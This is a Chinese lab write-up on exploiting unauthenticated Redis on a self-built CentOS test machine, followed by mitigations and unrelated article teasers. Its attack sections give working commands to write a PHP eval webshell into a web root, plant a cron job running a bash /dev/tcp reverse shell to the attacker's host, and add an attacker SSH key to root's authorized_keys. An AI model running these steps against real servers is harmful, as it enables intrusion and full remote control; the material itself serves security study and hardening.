Redis未授权访问漏洞实验

news2024/9/27 19:18:08

1 Redis简介

        Redis是一个开源的内存数据库管理系统,它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构,包括字符串、列表、集合、有序集合和哈希表,可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性,Redis常用于加速数据访问,提高应用程序的响应速度。

        此外,Redis还提供了持久化选项,允许数据在重启后仍然可用,使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案,特别适用于需要快速读写操作的应用场景。因此,许多大型互联网公司和开发者社区都广泛采用Redis,将其视为提升系统性能和可靠性的关键工具。

2 实验内容

        Redis未授权访问漏洞是一种安全漏洞,可能导致未经授权的用户或攻击者访问Redis数据库,甚至修改或删除其中的数据。这种漏洞通常发生在管理员未正确配置Redis实例的访问控制和认证机制时。

        本次实验利用Redis持久化机制与动态修改分配机制,复现以下三种利用方式:

  1. webshell提权
  2. 定时任务+反弹连接提权
  3. ssh key免密登录

        除了这些利用方式,Redis还有其他很多利用方式,如jackson发序列化,lua RCE,主从复制RCE等。

3 实验环境准备

        本次实验所有命令均在最高权限root下执行。

3.1 准备Redis服务器

3.1.1 下载安装Redis

        本次实验用CentOS 7进行Redis环境安装,Redis版本为6.0.9,首先准备一台CentOS 7虚拟机,执行如下命令安装Redis:

wget -P /usr/local/soft/ https://download.redis.io/releases/redis-6.0.9.tar.gz

        其中 /usr/local/soft/ 为指定的下载目录,可修改。

        解压安装包:

tar -zxvf redis-6.0.9.tar.gz

        Redis 是用 C 语言编写的,需要使用 GCC 编译器编译。然而,Redis 6.x.x 版本引入了多线程支持,要使用这个功能,需要安装 GCC 版本大于 4.9。

        CentOS 7 默认的 GCC 版本是 4.8.5,所以需要手动升级 GCC 到 4.9 或更高版本,以便使用 Redis 6.x.x 的多线程功能。

        升级gcc命令:

yum -y install centos-release-scl
yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++
devtoolset-9-binutils
scl enable devtoolset-9 bash
echo "source /opt/rh/devtoolset-9/enable" >>/etc/profile

        确认gcc的版本:

gcc -v

        查看回显的版本信息:

        进入到 /usr/local/soft/redis-6.0.9/src 目录下,执行编译安装命令:

make install

        安装后 src 目录下面出现服务端和客户端的脚本:

3.1.2 修改配置文件

        默认的配置文件是 /usr/local/soft/redis-6.0.9/redis.conf

        首先注释掉 bind 127.0.0.1 否则只能在本机访问。(vim编辑器中可按下 / 键,然后输入要搜索的文本,按 Enter 键进行搜索。按下 n 跳转到下一个匹配项,按下 N 跳转到上一个匹配项。)

       

         关闭保护模式,找到protected-mode并设置为no:

        可以通过 requirepass 设置密码,本次实验可以先不设。

3.1.3 启动Redis服务器

        为了方便命令输入,在 .bashrc 中为启动服务器命令配置redis别名,启动客户机命令配置rcli别名:

vim ~/.bashrc
alias redis='/usr/local/soft/redis-6.0.9/src/redis-server
/usr/local/soft/redis-6.0.9/redis.conf'
alias rcli='/usr/local/soft/redis-6.0.9/src/redis-cli'

        保存后source使得编译生效。

source ~/.bashrc

        新开一个终端,下面直接输入 redis 启动服务器。

        下面在本机连接Redis,输入

redis-cli -h 127.0.0.1 -p 6379

         连接成功后,输入

config get protected-mode

        查看回显是否为保护模式。

        如果回显为保护模式,需要在这里关掉:

config set protected-mode no

        再次确定关闭了保护模式:

3.2 搭建网站

        为了验证一句话木马上传,在服务端主机中简单模拟一个网站。

        (1)安装 httpd 服务。

yum install httpd -y

        (2)下载客户端。

yum install curl -y

        (3)关闭防火墙。

systemctl stop firewalld.service
systemctl disable firewalld.service

         (4)安装php服务

yum install php libapache2-mod-php

        (5)启动服务

systemctl start httpd

         进入得网站的根目录 /var/www/html ,创建一个 index.html ,简单写一个前端:

<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>欢迎访问我们的网站</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f2f2f2;
            margin: 0;
            padding: 0;
            text-align: center;
        }
        
        .welcome-container {
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            margin: 100px auto;
            max-width: 600px;
        }

        h1 {
            color: #333;
        }

        p {
            color: #666;
        }

        a {
            text-decoration: none;
            color: #007bff;
        }

        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="welcome-container">
        <h1>欢迎访问我们的网站</h1>
        <p>感谢您光临我们的网站。我们致力于提供优质的服务和内容。</p>
        <p>了解更多信息,请访问我们的 <a href="#">关于页面</a>。</p>
    </div>
</body>
</html>

3.3 准备Redis客户机

        这里用Redis客户机模拟攻击机。为了方便起见,可以将上面配置好的Redis服务器虚拟机复制一份作为攻击机。

        修改攻击机ip,保证攻击机ip与服务器ip不同:

vi /etc/sysconfig/network-scripts/ifcfg-ens33

        修改其中的 IPADDR 作为攻击机ip地址。为保证实验稳定性,将 BOOTPROTO 的值改为 static,保证ip不会改变。服务器如果是dhcp也需改为静态。

        在服务端已经准备完毕的情况下,连接Redis:

redis-cli -h <填写服务机的ip> -p 6379

3.4 环境测试

        攻击机成功连接Redis后,尝试输入一些命令查看能否回显成功。

        在同一个局域网内用另一个主机访问搭建好的网站(直接输入服务机ip),查看能否访问。

 4 Redis 持久化机制

        Redis 使用两种主要的持久化机制来确保数据在重启或故障恢复时不丢失:RDB快照和AOF日志。

        RDB快照(Redis DataBase):

        RDB是一种周期性将内存中的数据快照保存到磁盘上的机制,是一种紧凑的二进制文件,用于备份和恢复数据。可以配置Redis在不同的时间点生成RDB快照,例如,可以每隔一段时间自动创建一个快照,或者通过命令手动创建。

        AOF日志(Append-Only File):

        AOF日志是一种追加写入的日志文件,它记录了Redis服务器接收的每个写操作命令。AOF日志使Redis可以在重启时重新执行这些命令,从而实现数据的持久化。可以选择将AOF日志设置为不同的同步模式,例如,每次写操作都同步到磁盘,或者按一定时间间隔同步。

        Redis还提供了一种混合持久化的方式,即同时启用RDB快照和AOF日志。这样,即使在意外重启时,仍然可以使用RDB来快速恢复数据,同时使用AOF来保证更精确的数据完整性。

        要配置Redis的持久化机制,需要编辑Redis的配置文件(通常是redis.conf),并相应地调整以下配置选项:

  • save: 用于配置RDB快照的触发条件,如 save 3600 1。
  • appendonly: 用于启用AOF日志。
  • appendfsync: 用于配置AOF同步模式。
  • dbfilename dump.rdb 保存文件名

        持久化机制的选择取决于具体的需求和应用场景。如果需要更高的数据完整性和可靠性,可以选择使用AOF,但需要考虑性能开销。如果对性能要求更高,可以只使用RDB,但在某些情况下可能会有一些数据丢失。

5 webshell提权

5.1 上传木马

        如果攻击者已经知道网站根目录的位置,可以将Redis持久化数据文件存储目录设置到这个路径,将一句话木马写入网站根目录中。

        攻击机连接到Redis服务器后,输入以下命令:

config set dir /var/www/html
config set dbfilename shell.php
set x "<?php @eval($_POST[123]); ?>"
save

        解释:

        config set dir /var/www/html 用于配置Redis的持久化数据文件存储目录。它将持久化数据文件的存储路径设置为 /var/www/html,这是网站根目录的位置。

        config set dbfilename shell.php:用于配置Redis的持久化数据文件的文件名。它将持久化数据文件的文件名设置为 shell.php,这是一个PHP脚本文件的名称。

        set x "<?php @eval($_POST[123]); ?>":将一个名为"x"的键的值设置为一个一句话木马。

        save 用于触发Redis的持久化操作,将当前内存中的数据保存到磁盘上的持久化数据文件中。在这种情况下,它将保存包含上述PHP Webshell的数据到指定的目录和文件中。

       上面命令的目的是将一个PHP Webshell注入到Redis的持久化数据文件中,然后将该文件存储在指定的网站根目录下。允许攻击者执行恶意操作并获取对网站的控制权。

5.2 检验

        在服务端的网站根路径下,查看木马是否成功上传:

        打开蚁剑,能够连接到网站并执行命令。

 

 6 反弹连接

6.1 反弹连接原理

        反弹连接是指攻击者通过漏洞或恶意软件在目标计算机上建立一个与自己控制的远程服务器的连接,从而实现对目标计算机的远程控制。这种连接通常是“反向”的,因为它不是目标计算机主动连接攻击者的服务器,而是相反,攻击者的服务器主动连接到目标计算机,绕过了常规网络防火墙的检测。一旦建立了反弹连接,攻击者可以执行各种操作,包括执行命令、窃取数据、植入恶意软件等,从而对目标系统进行操控。

        不适合正向连接的情况:

  • 服务机无法被外网连接
  • 服务机ip动态变化
  • 无法对6379端口发送请求
  • 杀软查杀一句话木马

        反弹连接流程:

  • 攻击者需要在自己的系统上运行监听器程序,以侦听来自目标系统的连接请求。
  • 攻击者利用漏洞,将尝试连接到攻击者监听器的恶意代码注入到目标系统上。
  • 一旦目标系统上的恶意代码执行,它将尝试与攻击者的监听器建立连接。这个连接是从目标系统到攻击者的系统,因此称为反弹连接。
  • 一旦建立了反弹连接,攻击者就可以在目标系统上执行命令,获取远程访问权限,并控制目标系统。

        常见的建立反弹连接的恶意代码有很多,这里不再一一介绍。本实验采用常见的bash反弹连接:

bash -i >& /dev/tcp/(攻击机ip)/(攻击机监听的端口) 0>&1

        前面bash -i 表示启动一个交互式的 Bash shell,该 shell 将用于与靶机建立连接。

        >& 将标准错误输出合并到标准输出中。

        /dev/tcp/(攻击机ip)/(攻击机监听的端口) 这部分使用 Bash 的特性,尝试将 Bash shell 的输入和输出重定向到攻击者的机器的指定 IP 地址和端口。这意味着攻击者试图建立到指定 IP 地址和端口的网络连接,并将连接的输入和输出与 Bash shell 相关联,以便远程控制靶机。

        0>&1 将标准输入(文件描述符 0)重定向到标准输出(文件描述符 1),确保 shell 的输入和输出都被连接到网络连接上。实现在靶机上执行命令。

        上面命令在靶机上打开一个交互式bash终端,和攻击机建立远程连接,把终端发给控制机,在控制机上输入命令,攻击者可以在靶机上执行命令并得到这些命令的执行结果。

6.2 Redis建立反弹连接

        首先在攻击机上监听一个端口,这里监听的是7777端口:

nc -lvp 7777

        攻击机上连接到靶机Redis,执行下面的命令:

flushall
set x "\n* * * * * bash -i >& /dev/tcp/(攻击机ip)/7777 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

         解释:

        flushall 用于清空Redis数据库的数据。

        set x "\n* * * * * bash -i >& /dev/tcp/(攻击机ip)/7777 0>&1\n" x的值设为恶意命令,创建一个计划任务(cron job),每分钟执行一次一个 Bash 命令,将 Bash 的输出和错误输出重定向到指定的 IP 地址和端口,以远程连接攻击者的机器。

        后面两个命令和上一个实验一样,修改Redis 的持久化目录。/var/spool/cron/ 是用于存储与定时任务相关的文件目录。持久化文件的名称设置为 "root",可以试图混淆系统管理员,让他们认为这个持久化文件是与 root 用户相关的。

6.3 检验

        一分钟后查看监听的终端:

        看到Ncat已经连接到了靶机。

  • 用ifconfig 查看ip是否为靶机ip,执行时需要先将 /usr/sbin/ifconfig 连接到 /usr/bin/ifconfig。
ln -s /usr/sbin/ifconfig /usr/bin/ifconfig
ifconfig

        成功连接后就可以在靶机尝试执行各种命令了。

7 SSH keys 免密登录

        SSH keys 免密登录是通过使用 SSH(Secure Shell)协议中的密钥对来实现无需输入密码即可登录到远程服务器的一种方式。

  • 生成密钥对: 用户在本地计算机生成一对 SSH 密钥,包括公钥和私钥。
  • 传送公钥至服务器: 用户将生成的公钥复制到目标服务器上的 ~/.ssh/authorized_keys 文件中。
  • 私钥本地保存: 用户保留私钥在本地,通常存储在 ~/.ssh/ 目录下。
  • 登录时的验证: 当用户尝试通过 SSH 连接到服务器时,服务器会验证用户提供的公钥是否匹配服务器上存储的相应私钥。

        这样的机制允许用户在不输入密码的情况下通过 SSH 安全地登录到远程服务器。这对于自动化任务、脚本执行或减少手动输入密码的需求非常有用。

        攻击者可以自己生成一个公钥和私钥,利用Redis连接将公钥上传到靶机的指定目录,此时攻击者就可以利用生成好的私钥进行对靶机的免密远程登录。

        首先在靶机的根目录下创建 .ssh 空文件(如果没有的话)。

        在攻击机上,输入命令生成公钥和私钥:

ssh-keygen

         可以看到在当前目录下生成了一个 .ssh 隐藏文件。

         进入到文件中可以看到生成的公钥和私钥:

         然后将生成的公钥复制下来:

         下一步需要利用Redis持久化机制,将我们生成的公钥传到靶机的指定目录,攻击机上连接到靶机Redis后输入命令:

set x "\n\n(填入公钥)\n\n\n"
config set dir /root/.ssh
config set dbfilename authorized_keys
save

         写入成功后,尝试用自己的私钥连接靶机:

ssh -i ./id_rsa root@(靶机ip)

         ​​​​​​​

        忽略安全提示,直接输入yes继续连接,成功远程连接到靶机。 

8 防范措施

  • 限制访问IP: 将 Redis 部署在安全的环境(如内网)并限制访问IP是一种有效的安全措施。可以配置 Redis 只允许特定IP地址或IP地址范围的机器连接到数据库服务器。

  • 修改默认端口: 默认端口(6379)是众所周知的,攻击者可以尝试利用这一点来攻击 Redis 服务器。修改默认端口可以增加安全性。

  • 使用密码访问: 为Redis 数据库设置访问密码(requirepass配置项),确保密码强度足够高,这样,只有知道密码的人才能连接到数据库。

  • 不要使用root权限: 避免在 Redis 服务器上使用 root 权限来运行 Redis 进程。如果 Redis 进程受到攻击,攻击者可能会获得 root 权限,将对整个系统的安全构成威胁。使用一个普通的非特权用户来运行 Redis 进程,以限制攻击的潜在影响。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1073926.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++day03(动态内存、类中特殊成员函数)

今日任务 1> 思维导图 2> 设计一个Per类&#xff0c;类中包含私有成员:姓名、年龄、指针成员身高、体重&#xff0c;再设计一个Stu类&#xff0c;类中包含私有成员:成绩、Per类对象p1&#xff0c;设计这两个类的构造函数、析构函数和拷贝构造函数。 代码&#xff1a; …

【刷题】只出现一次的数字(三种解法)

【刷题】只出现一次的数字 文章目录 【刷题】只出现一次的数字解法异或运算解法一 : 异或运算解法二:集合类Set集合Map集合 链接: https://www.nowcoder.com/share/jump/2008263481696810321082 https://leetcode.cn/problems/single-number/description/ 题目描述 给定一个整…

线段树基本原理和操作

线段树的一些基本操作和原理&#xff1a; 由二分的思想而来&#xff0c;一段区间划分&#xff0c;实现大量数据的查询删除O(log(n)) 线段树&#xff08;英语&#xff1a;Segment tree&#xff09;是一种二叉树形数据结构&#xff0c;1977年由Jon Louis Bentley发明&#xff0…

文件操作【详解】

目录 一、什么是文件 二、文件的打开和关闭 1.文件指针 2.文件的打开和关闭 3.文件的打开方式 三、文件的顺序读写 1.关于输入输出&#xff0c;读和写 2.关于流的介绍 3.操作文件的函数 字符输入函数 fgetc的使用 字符输入函数 fputc的使用 文本行输出函数 fputs() …

awvs 中低危漏洞

低危 X-Frame-Options Header未配置 查看请求头中是否存在X-Frame-Options Header字段 会话Cookie中缺少secure属性(未设置安全标志的Cookie) 当cookie设置为Secure标志时&#xff0c;它指示浏览器只能通过安全SSL/TLS通道访问cookie。 未设置HttpOnly标志的Cookie 当cookie设置…

github小记(一):清除github在add或者commit之后缓存区

github清除在add或者commit之后缓存区 前言1. 第一步之后想要撤销2. 第二步之后想要撤销a. 改变一下rrr.txt的内容b. 想提交本地文件的test文件夹c. 我后悔了突然不想提交了 前言 github自用 一般github上代码提交顺序&#xff1a; 第一步&#xff1a; git add . or git ad…

好看的机制示意图绘制教程汇总

好看的机制示意图绘制教程汇总 蛋白翻译过程示意图&#xff0c;特别是其中的核糖体&#xff0c;需要很多绘制技巧。主要使用椭圆工具绘制两个椭圆&#xff0c;二者组合后使外形接近核糖体。接着通过路径查找器的合并功能&#xff08;并集&#xff09;将两个椭圆合并在一起。使…

linux--gdb的使用

1&#xff0c;Makefile默认release版本&#xff0c;要想进入debug版本需添加-g后缀 2&#xff0c;进入调试界面&#xff1a;gdb 可执行程序 3&#xff0c;显示代码&#xff1a;l&#xff08;list&#xff09; 数字&#xff08;1/0&#xff09; 不停回车可一直显示到结束并显…

CAS详解和学透面试必问并发安全问题

CAS&Atomic 原子操作详解 什么是原子操作&#xff1f;如何实现原子操作&#xff1f; 什么是原子性&#xff1f;相信很多同学在工作中经常使用事务&#xff0c;事务的一大特性就是原子性&#xff08;事务具有 ACID 四大特性&#xff09;&#xff0c;一个事务包含多个操作&a…

Zabbix监控系统 自定义监控项、自动发现与自动注册

Zabbix监控系统 自定义监控项、自动发现与自动注册 一、自定义监控内容部署实例二、zabbix 自动发现与自动注册部署实例2.1 部署zabbix自动发现 一、自定义监控内容部署实例 案列&#xff1a;自定义监控客户端服务器登录的人数 需求&#xff1a;限制登录人数不超过 3 个&#…

Jetpack:001-Jetpack概要介绍

文章目录 1. 概念介绍2. 主要内容2.1 框架库2.2 UI界面库 3. 核心思想4. 内容总结 本章回是一起Talk AndroidJetpack吧专栏的第一章回&#xff0c;本章回中主要介绍Jetpack的基本概念和编程思想&#xff0c;同时也会介绍它的基础知识。闲话休提&#xff0c;请我们一起Talk Andr…

【Vue面试题十三】、Vue中的$nextTick有什么作用?

文章底部有个人公众号&#xff1a;热爱技术的小郑。主要分享开发知识、学习资料、毕业设计指导等。有兴趣的可以关注一下。为何分享&#xff1f; 踩过的坑没必要让别人在再踩&#xff0c;自己复盘也能加深记忆。利己利人、所谓双赢。 面试官&#xff1a;Vue中的$nextTick有什么…

计算机视觉处理的开源框架

计算机视觉是一门涉及图像和视频分析的领域&#xff0c;有许多开源的框架和库可用于构建计算机视觉应用程序。以下是一些常见的计算机视觉开源框架及其特点&#xff0c;希望对大家有所帮助。北京木奇移动技术有限公司&#xff0c;专业的软件外包开发公司&#xff0c;欢迎交流合…

GNU和Linux的关系、 Linux的发行版本、CentOs和RedHat的区别

GNU和Linux的关系 其实&#xff0c;我们通常称之为的"Linux"系统&#xff0c;相对更准确的名称应该称为“GNU/Linux”系统&#xff01; 一个功能完全的操作系统需要许多不同的组成部分&#xff0c;其中就包括内核及其他组件&#xff1b;而在GNU/Linux系统中的内核就…

什么是成分分析?成分分析检测包括哪些?

成分分析:指通过微观谱图及激光飞秒检测方法对产品或样品的成分进行分析&#xff0c;对各个成分进行定性定量分析的技术方法。 成分分析技术主要用于对未知物、未知成分等进行分析&#xff0c;通过成分分析技术可以快速确定(最快的为激光飞秒检测通过观测分子、原子、电子、原…

【Mybatis源码】IDEA中Mybatis源码环境搭建

一、Mybatis源码源 在github中找到Mybatis源码地址&#xff1a;https://github.com/mybatis/mybatis-3 找到Mybatis git地址 二、IDEA导入Mybatis源码 点击Clone下载Mybatis源码 三、选择Mybatis分支 选择Mybatis分支&#xff0c;这里我选择的是3.4.x分支

点云分割segmentation

点云分割是根据空间、几何和纹理等特征对点云进行划分&#xff0c;使得同一划分区域内的点云拥有相似的特征 。点云的有效分割往往是许多应用的前提。例如&#xff0c;在逆向工程CAD/CAM 领域&#xff0c;对零件的不同扫描表面进行分割&#xff0c;然后才能更好地进行孔洞修复、…

Yocto Project 编译imx-第1节(下载和编译)

Yocto Project 编译imx-第1节&#xff08;下载和编译&#xff09; 前言说明参考文章版本说明Ubuntu 系统说明和建议必备软件安装设置Git用户名和密码解决git报错使用FastGithub 获取repo获取Yocto项目设置Yocto源获取Yocto版本&#xff08;https://source.codeaurora.org废弃&a…

【C++从0到王者】第三十六站:哈希

文章目录 一、unordered系列容器二、unordered_set三、unordered_map四、unordered_set与set的比较五、各种查找的比较六、哈希函数1.哈希函数概念与哈希冲突2.常见哈希函数 七、解决哈希冲突1.闭散列---开放定址法2.开散列---拉链法/哈希桶 一、unordered系列容器 在C98中&…

在校大学生想从事网络安全工程师,来听听过来人的经验,你会少走很多弯路

大家好&#xff01;一直以来都有一些大学生粉丝私聊向我“取经”&#xff0c;可以看得出来很多人对前路多多少少都有些迷茫&#xff0c;我把大家的问题总结了一下&#xff0c;并对每个问题都做了我自己的见解&#xff0c;高频出现的问题有以下几个&#xff1a; 1.国内程序员的…